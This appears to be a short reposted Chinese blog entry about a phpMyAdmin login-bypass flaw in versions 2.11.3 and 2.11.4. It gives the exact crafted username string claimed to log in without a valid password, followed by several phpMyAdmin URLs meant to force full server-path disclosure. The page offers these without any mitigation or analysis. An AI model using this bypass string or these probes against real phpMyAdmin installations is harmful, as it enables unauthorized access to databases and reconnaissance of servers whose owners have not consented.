【转】phpmyadmin万能密码漏洞

影响版本:2.11.3 / 2.11.4

利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)

附上几个php爆绝对路径的办法:

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

上一篇:Ext 修改内容之后 不做任何动作 再次修改时的数据是原来第一次修改前的数据


下一篇:string标准C++中的的用法总结(转)